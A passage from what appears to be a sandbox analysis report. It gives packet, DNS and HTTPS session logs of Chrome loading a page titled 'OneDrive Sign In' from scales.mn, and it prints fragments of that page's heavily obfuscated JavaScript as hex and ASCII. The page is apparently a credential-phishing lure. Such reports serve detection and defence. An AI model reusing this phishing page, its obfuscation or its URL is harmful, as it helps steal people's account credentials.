Jan 6, 2025 19:23:15.996270895 CET	49738	443	192.168.2.4	142.250.185.196
Jan 6, 2025 19:23:16.510653019 CET	49738	443	192.168.2.4	142.250.185.196
Jan 6, 2025 19:23:16.510687113 CET	443	49738	142.250.185.196	192.168.2.4
Jan 6, 2025 19:24:05.494304895 CET	49806	443	192.168.2.4	142.250.185.196
Jan 6, 2025 19:24:05.494328976 CET	443	49806	142.250.185.196	192.168.2.4
Jan 6, 2025 19:24:05.494425058 CET	49806	443	192.168.2.4	142.250.185.196
Jan 6, 2025 19:24:05.494657993 CET	49806	443	192.168.2.4	142.250.185.196
Jan 6, 2025 19:24:05.494673014 CET	443	49806	142.250.185.196	192.168.2.4
Jan 6, 2025 19:24:06.144016027 CET	443	49806	142.250.185.196	192.168.2.4
Jan 6, 2025 19:24:06.144423008 CET	49806	443	192.168.2.4	142.250.185.196
Jan 6, 2025 19:24:06.144435883 CET	443	49806	142.250.185.196	192.168.2.4
Jan 6, 2025 19:24:06.144751072 CET	443	49806	142.250.185.196	192.168.2.4
Jan 6, 2025 19:24:06.145051003 CET	49806	443	192.168.2.4	142.250.185.196
Jan 6, 2025 19:24:06.145113945 CET	443	49806	142.250.185.196	192.168.2.4
Jan 6, 2025 19:24:06.195874929 CET	49806	443	192.168.2.4	142.250.185.196
Jan 6, 2025 19:24:16.045823097 CET	443	49806	142.250.185.196	192.168.2.4
Jan 6, 2025 19:24:16.045878887 CET	443	49806	142.250.185.196	192.168.2.4
Jan 6, 2025 19:24:16.045948029 CET	49806	443	192.168.2.4	142.250.185.196
Jan 6, 2025 19:24:16.512310982 CET	49806	443	192.168.2.4	142.250.185.196
Jan 6, 2025 19:24:16.512330055 CET	443	49806	142.250.185.196	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 19:23:01.826977015 CET	53	62541	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:01.834265947 CET	53	53402	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:02.803792953 CET	53	54379	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:05.431018114 CET	63913	53	192.168.2.4	1.1.1.1
Jan 6, 2025 19:23:05.431144953 CET	62686	53	192.168.2.4	1.1.1.1
Jan 6, 2025 19:23:05.437778950 CET	53	63913	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:05.437969923 CET	53	62686	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:06.901101112 CET	59670	53	192.168.2.4	1.1.1.1
Jan 6, 2025 19:23:06.901276112 CET	61683	53	192.168.2.4	1.1.1.1
Jan 6, 2025 19:23:07.288314104 CET	53	59670	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:07.291829109 CET	53	61683	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:09.007715940 CET	54875	53	192.168.2.4	1.1.1.1
Jan 6, 2025 19:23:09.007715940 CET	63556	53	192.168.2.4	1.1.1.1
Jan 6, 2025 19:23:09.014760971 CET	53	54875	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:09.014775991 CET	53	63556	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:09.045335054 CET	53	50468	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:09.927881956 CET	53	57554	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:10.110913992 CET	53	58802	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:19.782068014 CET	53	58516	1.1.1.1	192.168.2.4
Jan 6, 2025 19:23:22.139703035 CET	138	138	192.168.2.4	192.168.2.255
Jan 6, 2025 19:23:38.548089027 CET	53	50697	1.1.1.1	192.168.2.4
Jan 6, 2025 19:24:01.129759073 CET	53	56315	1.1.1.1	192.168.2.4
Jan 6, 2025 19:24:01.517710924 CET	53	50288	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 6, 2025 19:23:10.110974073 CET	192.168.2.4	1.1.1.1	c225	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 6, 2025 19:23:05.431018114 CET	192.168.2.4	1.1.1.1	0x7b30	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 19:23:05.431144953 CET	192.168.2.4	1.1.1.1	0xf6b3	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 6, 2025 19:23:06.901101112 CET	192.168.2.4	1.1.1.1	0xbb48	Standard query (0)	scales.mn	A (IP address)	IN (0x0001)	false
Jan 6, 2025 19:23:06.901276112 CET	192.168.2.4	1.1.1.1	0x473f	Standard query (0)	scales.mn	65	IN (0x0001)	false
Jan 6, 2025 19:23:09.007715940 CET	192.168.2.4	1.1.1.1	0xfce2	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 19:23:09.007715940 CET	192.168.2.4	1.1.1.1	0xbb0e	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 6, 2025 19:23:05.437778950 CET	1.1.1.1	192.168.2.4	0x7b30	No error (0)	www.google.com		142.250.185.196	A (IP address)	IN (0x0001)	false
Jan 6, 2025 19:23:05.437969923 CET	1.1.1.1	192.168.2.4	0xf6b3	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 6, 2025 19:23:07.288314104 CET	1.1.1.1	192.168.2.4	0xbb48	No error (0)	scales.mn		43.231.112.47	A (IP address)	IN (0x0001)	false
Jan 6, 2025 19:23:09.014760971 CET	1.1.1.1	192.168.2.4	0xfce2	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Jan 6, 2025 19:23:09.014760971 CET	1.1.1.1	192.168.2.4	0xfce2	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Jan 6, 2025 19:23:09.014775991 CET	1.1.1.1	192.168.2.4	0xbb0e	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Jan 6, 2025 19:23:09.051724911 CET	1.1.1.1	192.168.2.4	0xdf21	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 19:23:09.051724911 CET	1.1.1.1	192.168.2.4	0xdf21	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 6, 2025 19:23:10.121344090 CET	1.1.1.1	192.168.2.4	0xe9a7	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 19:23:10.121344090 CET	1.1.1.1	192.168.2.4	0xe9a7	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

scales.mn

https:

cdnjs.cloudflare.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	43.231.112.47	443	3484	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 18:23:08 UTC	671	OUT	GET /file/one-drv11.html HTTP/1.1 Host: scales.mn Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-06 18:23:08 UTC	207	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 18:23:07 GMT Server: Apache Last-Modified: Thu, 28 Nov 2024 01:20:12 GMT Accept-Ranges: bytes Content-Length: 65207 Connection: close Content-Type: text/html
2025-01-06 18:23:08 UTC	7985	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 0d 0a 20 20 20 4f 6e 65 44 72 69 76 65 20 53 69 67 6e 20 49 6e 0d 0a 20 20 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 2f 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 65 67 6f 65 20 55 49 27 2c 20 54 61 68 6f 6d 61 2c 20 47 65 6e 65 76 61 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b Data Ascii: <html> <head> <title> OneDrive Sign In </title> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet"/> <style>body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
2025-01-06 18:23:09 UTC	8000	IN	Data Raw: 33 64 2c 5f 30 78 34 39 66 31 35 61 3a 30 78 31 30 64 2c 5f 30 78 34 63 31 32 39 30 3a 30 78 31 32 34 2c 5f 30 78 35 32 64 64 37 32 3a 30 78 31 31 39 2c 5f 30 78 32 35 38 31 33 34 3a 30 78 31 33 31 2c 5f 30 78 34 36 62 39 31 32 3a 30 78 31 31 31 2c 5f 30 78 33 62 63 39 66 66 3a 30 78 31 30 65 2c 5f 30 78 31 66 30 31 36 34 3a 30 78 31 32 61 2c 5f 30 78 36 31 36 32 35 36 3a 30 78 31 32 65 2c 5f 30 78 32 66 64 35 37 30 3a 30 78 31 33 37 2c 5f 30 78 33 65 38 63 33 61 3a 30 78 31 30 37 2c 5f 30 78 33 66 64 30 63 37 3a 30 78 31 31 65 2c 5f 30 78 34 36 61 33 65 62 3a 30 78 31 31 35 2c 5f 30 78 31 65 33 35 30 31 3a 30 78 31 30 63 2c 5f 30 78 35 38 36 36 38 66 3a 30 78 31 32 63 2c 5f 30 78 33 64 65 64 64 36 3a 30 78 31 39 33 2c 5f 30 78 31 66 35 62 30 39 3a 30 78 Data Ascii: 3d,_0x49f15a:0x10d,_0x4c1290:0x124,_0x52dd72:0x119,_0x258134:0x131,_0x46b912:0x111,_0x3bc9ff:0x10e,_0x1f0164:0x12a,_0x616256:0x12e,_0x2fd570:0x137,_0x3e8c3a:0x107,_0x3fd0c7:0x11e,_0x46a3eb:0x115,_0x1e3501:0x10c,_0x58668f:0x12c,_0x3dedd6:0x193,_0x1f5b09:0x
2025-01-06 18:23:09 UTC	8000	IN	Data Raw: 61 37 2c 5f 30 78 31 36 38 33 30 62 3a 30 78 34 61 34 2c 5f 30 78 39 31 61 64 34 63 3a 30 78 34 39 33 2c 5f 30 78 33 34 32 37 64 39 3a 30 78 34 38 34 2c 5f 30 78 33 30 65 30 65 30 3a 30 78 34 38 63 2c 5f 30 78 32 39 63 64 61 35 3a 30 78 34 38 62 2c 5f 30 78 34 61 36 63 39 61 3a 30 78 31 36 62 2c 5f 30 78 32 38 31 38 65 32 3a 30 78 31 37 38 2c 5f 30 78 34 31 39 31 38 65 3a 30 78 31 37 64 2c 5f 30 78 32 39 33 30 32 31 3a 30 78 31 38 32 2c 5f 30 78 34 39 61 62 62 64 3a 30 78 31 38 33 2c 5f 30 78 33 33 36 62 63 39 3a 30 78 31 37 63 2c 5f 30 78 35 34 34 65 63 34 3a 30 78 31 36 62 2c 5f 30 78 31 63 66 30 36 34 3a 30 78 31 35 34 2c 5f 30 78 33 35 35 64 39 36 3a 30 78 31 37 61 2c 5f 30 78 33 64 31 31 66 62 3a 30 78 34 36 32 2c 5f 30 78 35 35 37 36 39 38 3a 30 78 Data Ascii: a7,_0x16830b:0x4a4,_0x91ad4c:0x493,_0x3427d9:0x484,_0x30e0e0:0x48c,_0x29cda5:0x48b,_0x4a6c9a:0x16b,_0x2818e2:0x178,_0x41918e:0x17d,_0x293021:0x182,_0x49abbd:0x183,_0x336bc9:0x17c,_0x544ec4:0x16b,_0x1cf064:0x154,_0x355d96:0x17a,_0x3d11fb:0x462,_0x557698:0x
2025-01-06 18:23:09 UTC	8000	IN	Data Raw: 36 2c 5f 30 78 33 35 61 64 36 35 3a 30 78 31 33 65 7d 2c 5f 30 78 34 36 65 37 62 30 3d 7b 5f 30 78 31 32 37 37 34 64 3a 30 78 38 35 2c 5f 30 78 32 38 65 34 37 62 3a 30 78 35 62 2c 5f 30 78 35 38 38 36 64 62 3a 30 78 31 39 33 2c 5f 30 78 34 33 35 64 65 31 3a 30 78 62 31 2c 5f 30 78 33 34 36 32 65 38 3a 30 78 31 30 38 2c 5f 30 78 32 66 37 33 31 36 3a 30 78 31 35 65 2c 5f 30 78 35 62 32 65 64 37 3a 30 78 35 36 2c 5f 30 78 31 62 63 38 62 31 3a 30 78 31 38 33 2c 5f 30 78 35 65 63 62 63 30 3a 30 78 61 63 7d 2c 5f 30 78 32 38 65 36 34 66 3d 7b 5f 30 78 63 33 35 36 66 30 3a 30 78 31 35 64 2c 5f 30 78 35 30 35 30 65 36 3a 30 78 31 37 32 2c 5f 30 78 34 61 64 32 39 34 3a 30 78 31 65 30 2c 5f 30 78 35 33 61 62 35 62 3a 30 78 31 63 31 2c 5f 30 78 34 38 65 64 61 36 3a Data Ascii: 6,_0x35ad65:0x13e},_0x46e7b0={_0x12774d:0x85,_0x28e47b:0x5b,_0x5886db:0x193,_0x435de1:0xb1,_0x3462e8:0x108,_0x2f7316:0x15e,_0x5b2ed7:0x56,_0x1bc8b1:0x183,_0x5ecbc0:0xac},_0x28e64f={_0xc356f0:0x15d,_0x5050e6:0x172,_0x4ad294:0x1e0,_0x53ab5b:0x1c1,_0x48eda6:
2025-01-06 18:23:09 UTC	8000	IN	Data Raw: 36 32 38 63 35 2c 5f 30 78 39 38 65 31 65 32 2c 5f 30 78 31 31 31 66 35 33 2c 5f 30 78 36 66 61 63 32 34 29 7b 72 65 74 75 72 6e 20 5f 30 78 65 35 33 34 35 63 28 5f 30 78 35 37 36 66 33 64 2d 5f 30 78 33 39 36 34 39 62 2e 5f 30 78 35 36 36 61 37 64 2c 5f 30 78 31 32 62 39 65 32 2d 5f 30 78 33 39 36 34 39 62 2e 5f 30 78 32 64 62 33 37 61 2c 5f 30 78 32 32 32 61 32 31 2c 5f 30 78 32 61 63 64 37 32 2d 5f 30 78 33 39 36 34 39 62 2e 5f 30 78 32 66 36 63 61 35 2c 5f 30 78 33 32 30 61 62 63 2d 5f 30 78 33 39 36 34 39 62 2e 5f 30 78 32 35 64 33 30 31 2c 5f 30 78 32 32 32 61 32 31 2d 5f 30 78 33 39 36 34 39 62 2e 5f 30 78 35 33 66 63 37 63 2c 5f 30 78 32 36 32 38 63 35 2d 5f 30 78 33 39 36 34 39 62 2e 5f 30 78 32 32 36 64 65 63 2c 5f 30 78 39 38 65 31 65 32 2d 5f Data Ascii: 628c5,_0x98e1e2,_0x111f53,_0x6fac24){return _0xe5345c(_0x576f3d-_0x39649b._0x566a7d,_0x12b9e2-_0x39649b._0x2db37a,_0x222a21,_0x2acd72-_0x39649b._0x2f6ca5,_0x320abc-_0x39649b._0x25d301,_0x222a21-_0x39649b._0x53fc7c,_0x2628c5-_0x39649b._0x226dec,_0x98e1e2-_
2025-01-06 18:23:09 UTC	8000	IN	Data Raw: 78 34 39 36 37 30 38 2c 2d 5f 30 78 34 33 31 61 37 63 2e 5f 30 78 34 39 31 65 38 39 2c 2d 5f 30 78 34 33 31 61 37 63 2e 5f 30 78 32 33 37 64 62 2c 2d 5f 30 78 34 33 31 61 37 63 2e 5f 30 78 31 35 33 65 32 37 2c 2d 5f 30 78 34 33 31 61 37 63 2e 5f 30 78 34 63 63 31 37 32 2c 2d 5f 30 78 34 33 31 61 37 63 2e 5f 30 78 31 30 65 62 36 64 2c 2d 5f 30 78 34 33 31 61 37 63 2e 5f 30 78 31 37 35 37 66 32 2c 2d 5f 30 78 34 33 31 61 37 63 2e 5f 30 78 31 32 37 64 66 38 29 3b 7d 63 61 74 63 68 28 5f 30 78 34 36 37 64 62 36 29 7b 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 5b 5f 30 78 32 35 33 35 66 62 28 5f 30 78 34 33 31 61 37 63 2e 5f 30 78 33 33 62 37 38 36 2c 5f 30 78 34 33 31 61 37 63 2e 5f 30 78 34 66 31 34 63 33 2c 5f 30 78 34 33 31 61 37 63 2e 5f 30 78 31 63 35 66 Data Ascii: x496708,-_0x431a7c._0x491e89,-_0x431a7c._0x237db,-_0x431a7c._0x153e27,-_0x431a7c._0x4cc172,-_0x431a7c._0x10eb6d,-_0x431a7c._0x1757f2,-_0x431a7c._0x127df8);}catch(_0x467db6){return console[_0x2535fb(_0x431a7c._0x33b786,_0x431a7c._0x4f14c3,_0x431a7c._0x1c5f
2025-01-06 18:23:09 UTC	8000	IN	Data Raw: 61 64 2c 5f 30 78 64 37 38 65 33 61 2d 5f 30 78 35 33 62 64 64 64 2e 5f 30 78 65 66 62 61 35 34 2c 5f 30 78 31 62 61 61 66 66 2d 5f 30 78 35 33 62 64 64 64 2e 5f 30 78 33 32 38 34 33 35 2c 5f 30 78 35 36 36 36 37 34 2d 5f 30 78 35 33 62 64 64 64 2e 5f 30 78 61 66 30 62 63 2c 5f 30 78 35 36 36 36 37 34 2d 20 2d 5f 30 78 35 33 62 64 64 64 2e 5f 30 78 36 32 61 34 30 63 2c 5f 30 78 32 64 37 31 64 35 2d 5f 30 78 35 33 62 64 64 64 2e 5f 30 78 32 31 35 39 39 32 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 61 65 61 61 31 28 5f 30 78 34 38 63 63 62 35 2c 5f 30 78 32 63 33 64 61 35 2c 5f 30 78 32 64 65 63 34 62 2c 5f 30 78 39 38 37 31 35 38 2c 5f 30 78 34 37 35 62 37 34 2c 5f 30 78 31 64 31 62 35 32 2c 5f 30 78 38 65 31 30 30 66 2c 5f 30 78 63 31 66 65 36 64 2c Data Ascii: ad,_0xd78e3a-_0x53bddd._0xefba54,_0x1baaff-_0x53bddd._0x328435,_0x566674-_0x53bddd._0xaf0bc,_0x566674- -_0x53bddd._0x62a40c,_0x2d71d5-_0x53bddd._0x215992);}function _0x3aeaa1(_0x48ccb5,_0x2c3da5,_0x2dec4b,_0x987158,_0x475b74,_0x1d1b52,_0x8e100f,_0xc1fe6d,
2025-01-06 18:23:09 UTC	8000	IN	Data Raw: 78 36 39 5c 78 37 33 5c 78 37 34 5c 78 36 35 5c 78 36 65 5c 78 36 35 5c 78 37 32 27 2c 27 5c 78 36 35 5c 78 37 32 5c 78 37 32 5c 78 36 66 5c 78 37 32 27 2c 27 5c 78 33 38 5c 78 34 64 5c 78 36 34 5c 78 34 35 5c 78 35 31 5c 78 37 31 5c 78 35 31 27 2c 27 5c 78 33 36 5c 78 33 30 5c 78 33 30 5c 78 33 35 5c 78 33 37 5c 78 33 37 5c 78 33 36 5c 78 37 30 5c 78 35 34 5c 78 37 37 5c 78 35 33 5c 78 35 35 5c 78 36 61 27 2c 27 5c 78 36 32 5c 78 37 35 5c 78 37 34 5c 78 37 34 5c 78 36 66 5c 78 36 65 27 2c 27 5c 78 36 37 5c 78 36 37 5c 78 36 35 5c 78 37 32 27 2c 27 5c 78 33 32 5c 78 33 33 5c 78 33 36 5c 78 33 37 5c 78 33 33 5c 78 33 35 5c 78 33 30 5c 78 36 32 5c 78 36 63 5c 78 34 37 5c 78 35 35 5c 78 36 32 5c 78 36 35 27 2c 27 5c 78 36 65 5c 78 36 66 5c 78 36 65 5c 78 36 Data Ascii: x69\x73\x74\x65\x6e\x65\x72','\x65\x72\x72\x6f\x72','\x38\x4d\x64\x45\x51\x71\x51','\x36\x30\x30\x35\x37\x37\x36\x70\x54\x77\x53\x55\x6a','\x62\x75\x74\x74\x6f\x6e','\x67\x67\x65\x72','\x32\x33\x36\x37\x33\x35\x30\x62\x6c\x47\x55\x62\x65','\x6e\x6f\x6e\x6
2025-01-06 18:23:09 UTC	1222	IN	Data Raw: 31 2e 5f 30 78 34 61 64 30 63 36 2c 5f 30 78 31 61 36 66 36 62 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 30 39 62 62 31 28 5f 30 78 34 39 30 63 65 31 2c 5f 30 78 31 32 66 36 35 64 2c 5f 30 78 32 66 35 65 37 31 2c 5f 30 78 33 35 33 37 34 32 2c 5f 30 78 32 35 30 30 38 32 2c 5f 30 78 35 65 65 33 62 39 2c 5f 30 78 32 39 39 38 32 38 2c 5f 30 78 31 30 38 33 39 31 2c 5f 30 78 34 32 30 65 38 64 2c 5f 30 78 38 66 35 31 31 38 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 39 65 63 28 5f 30 78 32 66 35 65 37 31 2d 5f 30 78 32 63 65 64 38 31 2e 5f 30 78 32 35 63 65 31 63 2c 5f 30 78 33 35 33 37 34 32 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 33 33 61 38 35 28 5f 30 78 33 30 65 39 30 36 2c 5f 30 78 35 66 33 64 65 37 2c 5f 30 78 31 35 34 39 33 61 2c 5f 30 78 34 62 Data Ascii: 1._0x4ad0c6,_0x1a6f6b);}function _0x409bb1(_0x490ce1,_0x12f65d,_0x2f5e71,_0x353742,_0x250082,_0x5ee3b9,_0x299828,_0x108391,_0x420e8d,_0x8f5118){return _0x29ec(_0x2f5e71-_0x2ced81._0x25ce1c,_0x353742);}function _0x533a85(_0x30e906,_0x5f3de7,_0x15493a,_0x4b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49743	104.17.25.14	443	3484	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 18:23:09 UTC	572	OUT	GET /ajax/libs/font-awesome/5.15.3/css/all.min.css HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://scales.mn/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-06 18:23:09 UTC	951	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 18:23:09 GMT Content-Type: text/css; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"6599bda5-317b" Last-Modified: Sat, 06 Jan 2024 21:52:53 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 1070464 Expires: Sat, 27 Dec 2025 18:23:09 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S4geyjPHyahPslKzk2Q2piLi%2Fm%2FVQ%2B%2BCIRpaJtur4jATV%2FHXj88jAomQ76VpYMk1GZL59DDwmEIGvb24nwrp34zbCYDD0fByNg0PH0PTcQotjJao1puWKJ%2FrvGp52pTQJLJ3OOHE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 8fddbcd4fd4f41e9-EWR alt-svc: h3=":443"; ma=86400
2025-01-06 18:23:09 UTC	418	IN	Data Raw: 37 62 66 61 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 35 2e 31 35 2e 33 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 0a 2e 66 61 2c 2e 66 61 62 2c 2e 66 61 64 2c 2e 66 61 6c 2c 2e 66 61 72 2c 2e 66 61 73 7b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b Data Ascii: 7bfa/! Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) */.fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;
2025-01-06 18:23:09 UTC	1369	IN	Data Raw: 67 68 74 3a 2e 37 35 65 6d 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 2d 2e 30 36 36 37 65 6d 7d 2e 66 61 2d 78 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 65 6d 7d 2e 66 61 2d 73 6d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 65 6d 7d 2e 66 61 2d 35 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 35 65 6d 7d 2e 66 61 2d 36 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 36 65 6d 7d 2e 66 61 2d 37 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 37 65 6d 7d 2e 66 61 2d 38 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 65 6d 7d 2e 66 61 2d 39 78 Data Ascii: ght:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x
2025-01-06 18:23:09 UTC	1369	IN	Data Raw: 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d 31 29 22 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 39 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 39 30 64 65 67 29 7d 2e 66 61 2d 72 6f 74 61 74 65 2d 31 38 30 7b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d 32 29 22 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 7d 2e 66 61 2d 72 6f 74 61 74 65 2d 32 37 30 7b 2d 6d 73 2d 66 69 6c Data Ascii: Microsoft.BasicImage(rotation=1)";-webkit-transform:rotate(90deg);transform:rotate(90deg)}.fa-rotate-180{-ms-filter:"progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";-webkit-transform:rotate(180deg);transform:rotate(180deg)}.fa-rotate-270{-ms-fil
